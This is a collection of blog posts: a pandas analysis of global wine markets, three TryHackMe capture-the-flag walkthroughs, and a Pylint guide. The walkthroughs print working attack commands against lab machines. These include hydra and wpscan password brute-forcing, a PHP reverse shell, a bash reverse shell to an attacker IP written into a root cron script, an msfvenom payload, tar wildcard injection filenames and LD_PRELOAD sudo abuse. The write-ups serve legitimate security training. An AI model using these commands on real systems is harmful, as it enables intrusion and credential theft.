
Data Science Tells This Story About the Global Wine Markets 🍷


📖 Background

Many people like to relax or party with a glass of wine. That makes wine an important industry in many countries. Understanding this market is important to the livelihood of many people.

For fun, consider the following fictional scenario:

🍷 Story: You work at a multinational consumer goods organization that is considering entering the wine production industry. Managers at your company would like to understand the market better before making a decision.

💾 The Data

This dataset is a subset of the University of Adelaide’s Annual Database of Global Wine Markets.

The dataset consists of a single CSV file, data/wine.csv.

Each row in the dataset represents the wine market in one country. There are 34 metrics for the wine industry covering both the production and consumption sides of the market.

import pandas as pd

wine = pd.read_csv("wine.csv")
print(wine)

💡 Info: pandas.read_csv() is a function in the Pandas library that reads data from a CSV file and creates a DataFrame object. It has various parameters for customization and can handle missing data, date parsing, and different data formats. It’s a useful tool for importing and manipulating CSV data in Python.

💪 Challenge

Explore the dataset to understand the global wine market.

The given analysis should satisfy four criteria: Technical approach (20%), Visualizations (20%), Storytelling (30%), and Insights and recommendations (30%).

The Technical approach will focus on the soundness of the approach and the quality of the code. Visualizations will assess whether the visualizations are appropriate and capable of providing clear insights. The Storytelling component will evaluate whether the data supports the narrative and if the narrative is detailed yet concise. The Insights and recommendations component will check for clarity, relevance to the domain, and recognition of analysis limitations.


🍷 Wine Market Analysis in Four Steps

Step 1: Data Preparation

First, I import the necessary libraries and the dataset. Then, if necessary, I clean the data and see what features are available for analysis.

import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns

wine = pd.read_csv("wine.csv")

# Check DataFrame
print(wine.info())

I print some information about the DataFrame to get the column names and non-null counts with the DataFrame.info() method.

💡 Info: The Pandas DataFrame.info() method provides a concise summary of a DataFrame’s content and structure, including data types, column names, memory usage, and the presence of null values. It’s useful for data inspection, optimization, and error-checking.

Check "NaN" values:

wine[wine.isna().any(axis=1)]

There are some "NaN" values that we have to manage. It is logical that if a country has no "Vine Area", it cannot produce wine. So where the area is 0, we change production to 0.

print(wine[['Country', 'Wine produced (ML)']][wine["Vine Area ('000 ha)"] == 0])

        Country  Wine produced (ML)
6       Denmark                 NaN
7       Finland                 NaN
10      Ireland                 NaN
12       Sweden                 NaN
42    Hong Kong                 NaN
46     Malaysia                 NaN
47  Philippines                 NaN
48    Singapore                 NaN

wine.loc[wine["Vine Area ('000 ha)"] == 0, "Wine produced (ML)"] = 0

💡 Info: DataFrame.loc is a powerful Pandas accessor used for selecting or modifying data based on labels or boolean conditions. It allows for versatile data manipulations, including filtering, sorting, and value assignment.


Step 2: Gain Data Overview

To find the biggest importers and exporters and to get a more comprehensive picture of the market, I have created some queries.

DataFrame.nlargest(n, columns) is the easiest way to perform this search, where n is the number of rows to return and columns is the name of the column being searched. nlargest() returns those rows sorted in descending order.
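To see exactly what nlargest() returns, here is a quick, self-contained sketch on a toy DataFrame (the numbers are made up, not taken from the wine dataset):

```python
import pandas as pd

# Toy stand-in for the wine data, just to show the behavior:
df = pd.DataFrame({
    "Country": ["A", "B", "C", "D"],
    "Wine import vol. (ML)": [10, 40, 25, 5],
})

# The two rows with the largest import volumes, sorted descending:
top2 = df.nlargest(2, "Wine import vol. (ML)")
print(list(top2["Country"]))  # → ['B', 'C']
```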

best_10_importers_by_value = wine.nlargest(10, 'Value of wine imports (US$ mill)')
print(best_10_importers_by_value)
best_10_importers_by_liter = wine.nlargest(10, 'Wine import vol. (ML)')
print(best_10_importers_by_liter)
best_10_exporters_by_value = wine.nlargest(10, 'Value of wine exports (US$ mill)')
print(best_10_exporters_by_value)
best_10_exporters_by_liter = wine.nlargest(10, 'Wine export vol. (ML)')
print(best_10_exporters_by_liter)

Step 3: Create Diagrams

It is time to create diagrams.

Let’s look at imports/exports by country. I have put the import/export columns on the y-axis of a barplot for easy comparison. A barplot displays the relationship between a numeric (export/import) and a categorical (Countries) variable.

💡 Info: pandas.DataFrame.plot() is a method in the Pandas library that generates various visualizations from DataFrame objects. It’s easy to use and allows for customization of plot appearance and behavior. plot() is a useful tool for data exploration and communication.

I used the pandas built-in plot function to create the chart. The plot function here takes the x and y values, the kind of graph, and the title as arguments.

best_10_importers_by_liter.plot(x='Country', y=['Wine import vol. (ML)', 'Wine export vol. (ML)'], kind='bar', title='Import / Export by Country')

The first insight I got: it’s a bit surprising that France has the largest exports, yet still takes third or fourth place among importers. The French seem to like foreign wines.

Let’s see which countries do not produce enough wine to cover their own consumption. To do this, I subtracted production (less exports) from consumption in a new column.

#create new column to calculate wine demand
wine['wine_demand'] = wine['Wine consumed (ML)'] - (wine['Wine produced (ML)'] - wine['Wine export vol. (ML)'])

top_10_wine_demand = wine.nlargest(10, 'wine_demand')
print(top_10_wine_demand)

Or, visualized:
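A chart like this can be produced with the same plot pattern as above; the toy numbers below stand in for top_10_wine_demand so the snippet is self-contained:

```python
import matplotlib
matplotlib.use("Agg")  # headless backend so the script runs without a display
import pandas as pd

# Made-up stand-in for top_10_wine_demand (not the real dataset values):
top_demand = pd.DataFrame({
    "Country": ["UK", "Germany", "USA"],
    "wine_demand": [820, 610, 450],
})

# Same DataFrame.plot pattern used for the import/export chart:
ax = top_demand.plot(x="Country", y="wine_demand", kind="bar",
                     title="Top countries by wine demand (ML)")
```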

Is there enough GDP per capita for consumption?

I think that people who live in countries with a high GDP per capita can afford more wine, and more expensive wine.

I have created a seaborn relation plot, where the hue represents GDP and the y-axis represents wine demand.

💡 Info: Seaborn is a Python data visualization library that offers a high-level interface for creating informative and attractive statistical graphics. It’s built on top of the Matplotlib library and includes several color palettes and themes, making it easy to create complex visualizations with minimal code. Seaborn is often used for data exploration, visualization in scientific research, and communication of data insights.

I set the plot style to 'darkgrid' for a better look. Please note that this setting persists for the following graphs until you change it.

Seaborn’s relplot returns a FacetGrid object, which has a set_xticklabels method to customize the x labels.

sns.set_style('darkgrid')
chart = sns.relplot(data = top_10_wine_demand, x = 'Country', y = 'wine_demand', hue = "GDP per capita ('000 US$)")
chart.set_xticklabels(rotation = 65, horizontalalignment = 'right')

My main conclusion from this is that if you have a winery in Europe, the best place to sell your wine is in the UK and Germany, and otherwise, in the US.

Step 4: Competitor Analysis

And now, let’s look at the competitors:

Where does the cheapest wine come from, and which countries export a lot of cheap wine?

Since we have no direct data on this, I did a little feature engineering to find out which countries export wine at the lowest price per litre. Feature engineering is when we create a feature (a new column) that adds useful information derived from existing data.

wine['export_per_liter'] = wine['Value of wine exports (US$ mill)'] / wine['Wine export vol. (ML)']

top_10_cheapest = wine.nsmallest(10, 'export_per_liter')
print(top_10_cheapest)

Plot the findings:

top_10_cheapest.plot(x = 'Country', y = ['Value of wine exports (US$ mill)', 'Wine export vol. (ML)'], kind = 'bar', figsize = (8, 6))
plt.legend(loc = 'upper left', title = 'Cheapest wine exporters')

It is clear that Spain is by far the biggest exporter of cheap wine, followed by South Africa, but in much smaller quantities.

Conclusion

If you want to gain insight into large data sets, visualization is king and you don’t need fancy, complicated graphs to see the relationships behind the data clearly.

Understanding the tools is vital — without DataFrames, we wouldn’t have been able to pull off this analysis quickly and efficiently:

👉 Recommended Tutorial: Pandas in 10 Minutes


How I used Enum4linux to Gain a Foothold Into the Target Machine (TryHackMe)


💡 Enum4linux is a software utility designed to extract information from both Windows and Samba systems. Its primary objective is to provide functionality comparable to the now-defunct enum.exe tool, which was previously available at www.bindview.com. Enum4linux is written in Perl and essentially functions as a wrapper around the Samba tools smbclient, rpcclient, net, and nmblookup.

CHALLENGE OVERVIEW

  • CTF Creator: John Hammond
  • Link: Basic Pentesting
  • Difficulty: Easy 
  • Target: user flag and final flag
  • Highlight: extracting credentials from an SMB server with SMBmap
  • Tools used: nmap, dirb, enum4linux, john, hydra, linpeas, ssh
  • Tags: security, boot2root, cracking, webapp

BACKGROUND

This is a pretty standard type of CTF challenge that involves some recon, gaining an initial foothold, lateral privilege escalation, and discovery of the flags.

It was a great way to review how to use the standard pentesting tools (i.e., nmap, dirb, smbmap, john, hydra).

If you are just starting with CTF challenges, you may find some of the tools and concepts a bit technical. Please check out the video walkthrough if anything is unclear in this write-up!

ENUMERATION/RECON

IP ADDRESSES

export targetIP=10.10.192.10
export myIP=10.6.2.23

ENUMERATION

NMAP SCAN

nmap -A -p- -T4 -oX nmap.txt $targetIP
  • -A Enable OS detection, version detection, script scanning, and traceroute
  • -p- scan all ports
  • -T4 speed 4 (1-5 with 5 being the fastest)
  • -oX output as an XML-type file

DIRB SCAN

dirb http://$targetIP -o dirb.txt
  • -o output as <filename>

WALK THE WEBSITE

Check our dev note section if you need to know what to work on. (I found this hint in the source code.)

http://10.10.192.10/development/

Reading through these two documents, we learn the following interesting things:

  • User "J" has a weak password hash in /etc/shadow that can be cracked easily!
  • We may be able to find an exploit for REST version 2.5.12

Searching through exploit-db we find two possibilities:

  1. https://www.exploit-db.com/exploits/45068
  2. https://www.exploit-db.com/exploits/42627 (this one is probably it!)

I tried out this python exploit, but didn’t have any luck. Let’s move forward for now and enumerate the SMB server.

ENUMERATING SMB

smbmap -H $targetIP

We see a listing for an anonymous login in our results. However, we aren’t able to log in as anonymous.

USING ENUM4LINUX TO EXTRACT SSH LOGIN CREDENTIALS

enum4linux -a 10.10.192.10

  • -a Do all simple enumeration (-U -S -G -P -r -o -n -i)

Found two users: kay and jan.

My guess is that our first credential with the easy hash belongs to user jan, because the hidden file j.txt in the /development folder was addressed to "J".

USING HYDRA TO BRUTEFORCE A PASSWORD FOR JAN/KAY

hydra -l jan -t 4 -P /home/kalisurfer/hacking-tools/rockyou.txt ssh://10.10.192.10
hydra -l kay -P /home/kalisurfer/hacking-tools/rockyou.txt ssh://10.10.192.10

Discovered password for jan: armando

LOCAL RECON – LOG IN AS JAN VIA SSH

We’ll automate our local recon with linpeas.sh

To get the script on our target system, we spin up a simple python3 HTTP server on our attack box and use wget to copy it to the /tmp directory of our target system.
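The same serve-and-fetch pattern can be sketched entirely in Python — the http.server module is what `python3 -m http.server` runs under the hood. This demo runs locally with a stand-in file instead of the real linpeas.sh (filename and contents are assumptions for illustration):

```python
import functools
import http.server
import os
import socketserver
import tempfile
import threading
import urllib.request

# Stand-in for linpeas.sh, served from a temp directory:
serve_dir = tempfile.mkdtemp()
with open(os.path.join(serve_dir, "linpeas.sh"), "w") as f:
    f.write("#!/bin/bash\necho linpeas-demo\n")

# Bind port 0 so the OS picks a free port (on the attack box you would
# just run `python3 -m http.server 8000` in the directory instead):
handler = functools.partial(http.server.SimpleHTTPRequestHandler,
                            directory=serve_dir)
httpd = socketserver.TCPServer(("127.0.0.1", 0), handler)
port = httpd.server_address[1]
threading.Thread(target=httpd.serve_forever, daemon=True).start()

# On the real target you would run: wget http://<attacker-ip>:8000/linpeas.sh
data = urllib.request.urlopen(f"http://127.0.0.1:{port}/linpeas.sh").read()
httpd.shutdown()
```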

After running linpeas.sh, we review the results and find a hidden SSH key for user kay. Our next step is to prep and crack its hash to discover the passphrase needed to log in as kay.

LATERAL PRIVILEGE ESCALATION TO USER KAY

First, we’ll use ssh2john to prep the hash for use with John the Ripper.

Next, we’ll crack the password for the hash with john. 

Now that we’ve brute-forced the password using the rockyou.txt wordlist, we can go ahead and switch users to kay with the password beeswax.

POST-EXPLOITATION

Locate the pass.bak file.

Cat it to find the "final password".

FINAL THOUGHTS

This box showed the power of enum4linux for enumerating Linux machines. We were able to extract two usernames that helped us to brute force our way into the server and gain our initial foothold.

Linpeas can do similar things, but the big difference between the two is that linpeas is for local enumeration after you have a shell, while enum4linux is for initial enumeration before gaining a foothold.

👉 Recommended: Web Hacking 101: Solving the TryHackMe Pickle Rick "Capture The Flag" Challenge


TryHackMe – How I Used WPScan to Extract Login Credentials (WordPress)


CHALLENGE OVERVIEW


BACKGROUND

This CTF challenge is another blackbox-style pentest where we don’t know anything about our target other than the IP address.

We will have to discover ports and services running on the server with our standard pentesting tools like nmap and dirb scan. We also don’t have any inside information about the backend of the target machine.

Let’s get started!

We’ll be testing out the website pentest.ws during today’s video walkthrough.

It is a site designed for pentesters to keep track of their enumeration and credentials. The paid version also helps pentesters create professional VAPT reports (vulnerability assessment and penetration testing reports).

At the end of this post, I will summarize my thoughts on using pentest.ws for the first time.

ENUMERATION/RECON

sudo nmap -A -oX nmap.txt $targetIP -p-

Today we are exporting our nmap results in XML format so that we can upload them to pentest.ws and have the site automatically parse our findings.

dirb http://$targetIP -o dirb.txt

We discovered a WordPress login at: http://internal.thm/blog/wp-login.php

USING WPSCAN TO EXTRACT WORDPRESS LOGIN CREDENTIALS

Let’s use wpscan to discover the admin’s email and password for WordPress.

wpscan --url 10.10.61.252/blog -e vp,u -o wpscan.txt

Now that we found a username, we can run wpscan again with a wordlist to brute-force the password.

wpscan --url 10.10.61.252/blog --usernames admin --passwords /home/kalisurfer/hacking-tools/rockyou.txt --max-threads 50 -o wpscan-passwds.txt

We found the admin email and password!

admin:my2boys

Now we can log into WordPress and look for a place to upload a revshell.

INITIAL FOOTHOLD – SPAWN A REVSHELL BY EDITING 404.PHP

We’ll edit the template for 404.php and drop in a revshell created quickly and easily with EzpzShell.py.

If you want to learn more about ezpzshell, check out my previous blog post:

👉 Learn More: EzpzShell: An Easy-Peasy Python Script That Simplifies Revshell Creation

ezpz 10.6.2.23 8888 php (ezpzshell also automatically starts a listener)

After copying the payload to 404.php, we make sure it is saved and then trigger the payload:

http://internal.thm/wordpress/wp-content/themes/twentyseventeen/404.php

And if everything is set up correctly, we will catch the revshell with ezpz as user: www-data.

STABILIZE THE SHELL

The following command will stabilize the shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

INTERNAL ENUMERATION – FIND USER CREDS

We discover a txt file with credentials:

cat wp-save.txt

Bill,
Aubreanna needed these credentials for something later. Let her know you have them and where they are.
aubreanna:bubb13guM!@#123

Let’s try switching users to aubreanna with the password given in wp-save.txt.

su aubreanna

We are in as user aubreanna and immediately find the user flag.

aubreanna@internal:~$ cat user.txt
THM{i------omitted--------1}

MORE ENUMERATION – DISCOVER A JENKINS SERVICE

cat jenkins.txt

Internal Jenkins service is running on 172.17.0.2:8080

SET UP PORT FORWARDING VIA SSH LOGIN

ssh -L 8080:172.17.0.2:8080 aubreanna@10.10.61.252

Success! We’ve connected to Jenkins via SSH port forwarding. We can now open the Jenkins login page in our browser.

BRUTE-FORCE THE LOGIN

hydra -l admin -P /home/kalisurfer/hacking-tools/SecLists/Passwords/Leaked-Databases/rockyou-75.txt -s 8080 127.0.0.1 http-post-form '/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&login=:Invalid username or password'

The payload on this command has three parts:

  1. http-post-form + header
  2. the request, edited with admin as the username and ^PASS^ in place of the password to mark it as the variable for the password wordlist
  3. the error message that the website will return with a wrong password

Using Burp Suite or developer mode in Firefox allows us to extract these strings and modify them into our final hydra payload.

Output:

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-06 08:57:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 59185 login tries (l:1/p:59185), ~3700 tries per task
[DATA] attacking http-post-form://127.0.0.1:8080/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&login=:Invalid username or password
[STATUS] 396.00 tries/min, 396 tries in 00:01h, 58789 to do in 02:29h, 16 active
[8080][http-post-form] host: 127.0.0.1 login: admin password: spongebob
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-06 08:58:10

Credentials found! admin:spongebob

ENUMERATING JENKINS AS ADMIN

We’ll use the script console on Jenkins to spawn another revshell using groovy scripting language.

We’ll use ezpzshell and choose the Java code, because Groovy is built on Java. This time when we catch the shell, we will be user jenkins.

Manually enumerating through the file system we stumble across a note.txt. Let’s check out the contents:

cat note.txt

Output:

Aubreanna, Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you need access to the root user account. root:tr0ub13guM!@#123

Bingo! We found root user credentials!

SWITCH USERS TO ROOT

su root
root@internal:~# cat root.txt
THM{d--omitted--3r}

FINAL THOUGHTS

I’m not convinced yet that pentest.ws will save me much time on my note taking. Maybe with time and experience it would help.

I think the report features that are available for paying subscribers might be just helpful enough to keep me using their platform.

However, I have concerns about the security of their platform, as pentesting findings can be sensitive and often include login credentials and other passwords.

Overall, I enjoyed the challenge of this box, especially the part where we set up port forwarding via SSH login to expose the Jenkins login portal to our attack machine.

👉 Recommended: EzpzShell: An Easy-Peasy Python Script That Simplifies Revshell Creation


TryHackMe Linux PrivEsc – Magical Linux Privilege Escalation (1/2)


CHALLENGE OVERVIEW

  • CTF Creator: Tib3rius
  • Link: https://tryhackme.com/room/linuxprivesc
  • Difficulty: medium 
  • Target: gaining root access using a variety of different techniques
  • Highlight: Quickly gaining root access on a Linux computer in many different ways
  • Tags: privesc, linux, privilege escalation

BACKGROUND

Using different exploits to compromise operating systems can feel like magic (when they work!).

In this walkthrough, you will see various "magical" ways that Linux systems can be rooted. These methods rely on the Linux system having misconfigurations that allow various read/write/execute permissions on files that should be better protected. In this post, we will cover tasks 1-10.

TASK 1 Deploy the Vulnerable Debian VM

After connecting to our TryHackMe VPN, let’s start our notes.txt file and write down our IPs in an export fashion.

export targetIP=10.10.63.231
export myIP=10.6.2.23

Now we can go ahead and log in via SSH using the starting credentials given in the instructions:

ssh user@10.10.63.231
id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)

Now that we are in via SSH, let’s start exploiting this machine!

TASK 2 Service Exploits

In this task, we will privesc by exploiting MySQL using https://www.exploit-db.com/exploits/1518

We’ll create a new file named rootbash that spawns a root shell. This box has the exploit preloaded, so all we have to do is cut and paste the commands from this section to try out the privesc.

TASK 3 Weak File Permissions – Readable /etc/shadow

In this task, we will read /etc/shadow and crack the hash with John the Ripper.

First, we need to save the root entry from /etc/shadow file as hash.txt.

Next, let’s load up John and crack the hash with rockyou.txt as our wordlist:

john --wordlist=</PATH/TO/>rockyou.txt hash.txt

We have found our root password, password123!

TASK 4 Weak File Permissions – Writeable /etc/shadow

In this task, we will change the root password in /etc/shadow file.

mkpasswd -m sha-512 newpasswordhere
$6$pz5mE.wYesKIYGN$jyRHWFXauy1tWmXLWABRKFjUplUH4u7w2YvxEysk5OPcS.HcgBoQkYt66gkkuMB6EKK8WUh1CY.BAO2mdOdPb.
user@debian:~/tools/mysql-udf$ nano /etc/shadow
user@debian:~/tools/mysql-udf$ su root
Password:
root@debian:/home/user/tools/mysql-udf#

TASK 5 Weak File Permissions – Writeable /etc/passwd

In this task, we will change the root password via the /etc/passwd file. First, we need to generate a new hashed password:

openssl passwd newpasswordhere

Then we replace the "x" in the root entry of /etc/passwd with the generated hash and run su root with the new password.

TASK 6 Sudo – Shell Escape Sequences

Let’s check our sudo privileges:

sudo -l

We can choose any of the many bin files we have sudo permissions on, except for the apache2 binary, which doesn’t have a sudo exploit listed on GTFOBins.

Today we’ll choose to run the exploit utilizing the more bin file.

👉 Link: https://gtfobins.github.io/gtfobins/more/

Running the following command, then typing the escape sequence at the more prompt, gives us a root shell:

TERM= sudo more /etc/profile
!/bin/sh

TASK 7 Sudo – Environment Variables

Method 1: preload file spoofing

gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
sudo LD_PRELOAD=/tmp/preload.so more

Method 2: shared object spoofing

ldd /usr/sbin/apache2
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
sudo LD_LIBRARY_PATH=/tmp apache2

TASK 8 Cron Jobs – File Permissions

In this task, we will root the Linux box by changing the file overwrite.sh, which cron is scheduled to run automatically every minute.

Because we have write permissions on the file, we can change its contents to spawn a revshell that we can catch on a listener. The file is owned by root, so it will spawn a root shell.

Overwrite the file with the following:

#!/bin/bash
bash -i >& /dev/tcp/10.6.2.23/8888 0>&1

Now, all we need to do is start a netcat listener and wait for a maximum of 1 minute to catch the revshell.

nc -lnvp 8888

TASK 9 Cron Jobs – PATH Environment Variable

In this task, we will hijack the PATH environment variable by creating an overwrite.sh file in /home/user directory.

user@debian:~$ cat overwrite.sh
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash

This bash script copies /bin/bash (the shell) to the /tmp directory, then adds execute permissions and the suid bit. After overwrite.sh runs, we can manually activate the root shell by running the new "rootbash" file with the -p (privileged) flag, which preserves the effective root UID.

user@debian:~$ /tmp/rootbash -p
rootbash-4.1# id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
rootbash-4.1# exit

TASK 10 Cron Jobs – Wildcards

In this exploit, we will use crafted filenames to trick tar into parsing them as command-line options: the --checkpoint and --checkpoint-action flags make the scheduled tar command execute our ELF shell, giving us a root shell on our netcat listener.

First, let’s create a new payload for a revshell

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.6.2.23 LPORT=8888 -f elf -o shell.elf

Next, we’ll transfer the elf file to /home/user on the target via a simple HTTP server. Then we need to create two empty files with the following names:

touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf

Finally, we’ll need to start up a netcat listener to catch the root shell.

nc -lnvp 8888

POST-EXPLOITATION

Let’s remove the shell and the two spoofed checkpoint files.

rm /home/user/shell.elf
rm /home/user/--checkpoint=1
rm /home/user/--checkpoint-action=exec=shell.elf

FINAL THOUGHTS

Magic isn’t actually needed to carry out any of the privesc methods outlined in this post.

As long as the target machine has misconfigured password files (/etc/shadow and/or /etc/passwd), cron jobs that run files we can modify or spoof, or a PATH variable that we can hijack with a spoofed file, we can easily escalate privileges to the root user.

Thanks for reading this write-up, and be sure to check out part II for more "magical" privesc methods.


Stop Writing Messy Code! A Helpful Guide to Pylint


As a Python developer, you know how important it is to write high-quality, error-free code. But let’s face it – sometimes it’s hard to catch every little mistake, especially when working on large projects or collaborating with a team.

That’s where Pylint comes in.


Pylint is like a trusty sidekick for your code, helping you spot errors, enforce good coding habits, and keep your code consistent and clean. It’s like having a second set of eyes to catch the little things that you might have missed.

But Pylint isn’t just for the big leagues – it’s a tool that can benefit developers of all levels.

In this article, we’ll dive into Pylint and cover everything you need to know to get started – from installation and configuration, to using Pylint in your favorite code editor, to tackling common errors and warnings that Pylint can help you catch.

So whether you’re a seasoned pro or a Python newbie, let’s dive in and see what Pylint can do for your code!

Installing and Configuring Pylint

Installing Pylint is a straightforward process, and there are several ways to do it.

One of the most popular methods is to use pip, Python’s package manager. To install Pylint using pip, simply open your command prompt or terminal and type:

pip install pylint

If you’re using a different package manager, you can consult their documentation for specific installation instructions.

Once you have Pylint installed, it’s important to configure it to match your project’s needs. Pylint has many configuration options that can be customized to fit your preferences and coding style. For example, you might want to change the maximum line length or enable/disable specific checks based on your project’s requirements.

To configure Pylint, you can create a configuration file in your project’s root directory. The default configuration file name is .pylintrc, but you can also specify a different file name or path if needed. The configuration file is written in INI format, and it contains various sections and options that control Pylint’s behavior.

Here’s an example of a basic .pylintrc file:

[MASTER]
max-line-length = 120

[MESSAGES CONTROL]
disable = missing-docstring, invalid-name

This file sets the maximum line length to 120 characters and disables two specific checks related to missing docstrings and invalid variable names. You can customize the file to match your project’s requirements and coding style.

Keep in mind that Pylint also provides many command-line options that can override or supplement the configuration file settings. You can run pylint --help to see a list of available options.

With these steps, you should be able to install and configure Pylint to help you keep your code in top shape. In the next section, we’ll explore how to use Pylint within popular code editors like VSCode and PyCharm.

Pylint in Code Editors

When it comes to writing code, most developers prefer to use a code editor that can provide real-time feedback and make the coding process easier. Fortunately, Pylint can be integrated with many popular code editors, making it easier to use and providing real-time feedback.

Let’s take a look at how to set up Pylint in two of the most popular code editors, VSCode and PyCharm.

👉 Recommended: Best IDE and Code Editors

Setting up Pylint in VSCode

  1. Open VSCode and install the Python extension if you haven’t already.
  2. Open a Python project in VSCode.
  3. Press Ctrl + Shift + P to open the Command Palette and type “Python: Select Linter”. Choose “Pylint” from the list.
  4. You may be prompted to install Pylint if you haven’t already. If prompted, select “Install”.
  5. You should now see Pylint output in the VSCode “Problems” panel. Pylint will automatically check your code as you type, and will show any errors or warnings in real-time.

Setting up Pylint in PyCharm

  1. Open your Python project in PyCharm.
  2. Go to Preferences > Tools > External Tools.
  3. Click the + button to add a new external tool. Fill in the fields as follows:
    • Name: Pylint
    • Program: pylint
    • Arguments: --output-format=parseable $FileDir$/$FileName$
    • Working directory: $ProjectFileDir$
  4. Click OK to save the new external tool.
  5. Go to Preferences > Editor > Inspections.
  6. Scroll down to the “Python” section and make sure that “Pylint” is checked.
  7. Click OK to save your settings.
  8. You should now see Pylint output in the PyCharm “Inspection Results” panel. Pylint will check your code as you type or run your project, and will show any errors or warnings in real-time.

By using Pylint in your code editor, you can quickly spot and fix issues in your code, making it easier to maintain high code quality. With Pylint checking your code in real-time, you can focus on writing great code without worrying about common mistakes. In the next section, we’ll compare Pylint with another popular Python linter, Flake8.

Pylint vs. Flake8

While Pylint is a powerful tool for analyzing Python code, it’s not the only linter out there. Another popular linter is Flake8, which, like Pylint, can help you identify errors, enforce coding standards, and keep your code consistent.

But what are the differences between these two tools, and which one should you use?

Comparing Pylint and Flake8

Pylint and Flake8 have several similarities, but they also have some key differences. Here are some of the most important differences to consider:

  • Scope: Pylint is a more comprehensive tool that can check for a wide range of issues, including potential bugs, coding style, and design patterns. Flake8, on the other hand, focuses primarily on coding style issues and is more lightweight.
  • Configuration: Pylint has many configuration options that can be customized to fit your coding style and preferences. Flake8, on the other hand, has fewer configuration options but is generally easier to set up and use out of the box.
  • Performance: Pylint can be slower than Flake8, especially on large projects. This is because Pylint analyzes code more thoroughly and performs more complex checks than Flake8.
  • Output: Pylint provides more detailed output than Flake8, including error codes, severity levels, and more. Flake8, on the other hand, provides simpler, more straightforward output.

Which One Should You Use?

πŸ‘‰ Decision Framework: If you’re working on a large project and want a more comprehensive analysis of your code, Pylint might be the better choice. If you’re looking for a simpler, more lightweight tool that focuses on coding style issues, Flake8 might be a better fit.

In many cases, you can use both Pylint and Flake8 together to get the best of both worlds.

For example, you can use Pylint to perform a comprehensive analysis of your code and use Flake8 to focus on coding style issues. You can also use both tools in your code editor to get real-time feedback as you type.

In the next section, we’ll dive into some common errors and warnings that Pylint can help you catch in your code.

Common Pylint Errors and Warnings

As you use Pylint to analyze your Python code, you may encounter various errors and warnings that highlight potential issues or inconsistencies in your code. In this section, we’ll address some of the most common issues that Pylint may raise, and provide guidance on how to fix them and improve your code quality.

“Line too long” error

One of the most common errors that Pylint may raise is the “line too long” error (message ID C0301), which occurs when a line of code exceeds the maximum line length specified in your Pylint configuration. By default, this limit is 100 characters, but you can change it to fit your preferences.
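If your team prefers a different limit, you can override it in a .pylintrc file at the project root. The value below is just an illustration, not a recommendation:

```ini
; .pylintrc -- example only; pick the limit your team agrees on
[FORMAT]
max-line-length=120
```

Pylint picks this file up automatically when you run it from the project directory.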

To fix this issue, you can break the line into multiple lines, preferably by wrapping the expression in parentheses (which allow implicit line continuation) or, less commonly, with the explicit backslash (\) continuation character.

Here’s an example:

# Before
some_very_long_function_name(arg1, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10)

# After
some_very_long_function_name(
    arg1, arg2, arg3, arg4, arg5,
    arg6, arg7, arg8, arg9, arg10
)

“Too many branches” and “too many statements” warnings

Another set of common warnings that Pylint may raise are the “too many branches” and “too many statements” warnings. These warnings are raised when a function or method has too many conditional branches or too many statements, respectively. They’re a sign that your code might be too complex and difficult to maintain.

To address these warnings, you can refactor your code to make it more modular and easier to understand.

For example, you can break down a long function into smaller functions, or replace a chain of if/else statements with a dictionary dispatch or a match statement (Python 3.10+), since Python has no switch statement.

Here’s an example:

# Before
def complex_function():
    if condition1:
        ...  # do something
    elif condition2:
        ...  # do something else
    elif condition3:
        ...  # do something even different
    else:
        ...  # do something completely different

# After
def simpler_function():
    if condition1:
        do_something()
    elif condition2:
        do_something_else()
    elif condition3:
        do_something_different()
    else:
        do_something_completely_different()

def do_something():
    ...  # do something

def do_something_else():
    ...  # do something else

def do_something_different():
    ...  # do something even different

def do_something_completely_different():
    ...  # do something completely different

By breaking down complex code into smaller, more manageable pieces, you can make your code easier to understand and maintain.
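Another refactoring that Pylint's complexity warnings often nudge you toward is dictionary dispatch: mapping keys to handler functions instead of chaining if/elif branches. A minimal sketch (the handler and operation names are made up for illustration):

```python
def handle_add(x, y):
    return x + y

def handle_sub(x, y):
    return x - y

# One dictionary lookup replaces a chain of if/elif branches.
HANDLERS = {
    "add": handle_add,
    "sub": handle_sub,
}

def dispatch(op, x, y):
    try:
        return HANDLERS[op](x, y)
    except KeyError:
        raise ValueError(f"unknown operation: {op}")

print(dispatch("add", 2, 3))  # → 5
```

Adding a new operation is now a one-line change to the dictionary, and the function stays small enough to keep Pylint quiet.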

By addressing these common errors and warnings that Pylint may raise, you can improve the quality and readability of your code, making it easier to maintain and scale.

In the next section, we’ll wrap up the article and summarize the benefits of using Pylint in your Python projects.

Conclusion

In this article, we’ve explored Pylint, a powerful tool for analyzing Python code and improving code quality.

  • We started by discussing how to install and configure Pylint, highlighting the importance of customizing Pylint to match your project’s needs.
  • We then dove into how to use Pylint in popular code editors like VSCode and PyCharm, providing step-by-step instructions for setup and highlighting the benefits of using Pylint for real-time feedback.
  • Next, we compared Pylint with another popular linter, Flake8, and discussed the strengths and weaknesses of each tool.
  • Finally, we addressed some common errors and warnings that Pylint may raise, providing guidance and code examples on how to fix these issues and improve your code quality.

Pylint is a valuable tool that can help you maintain high code quality and avoid common mistakes. By using Pylint to analyze your code, you can catch errors and warnings before they become bigger issues, making it easier to maintain and scale your projects. With real-time feedback and customizable settings, Pylint is a great asset for developers of all levels and experience.

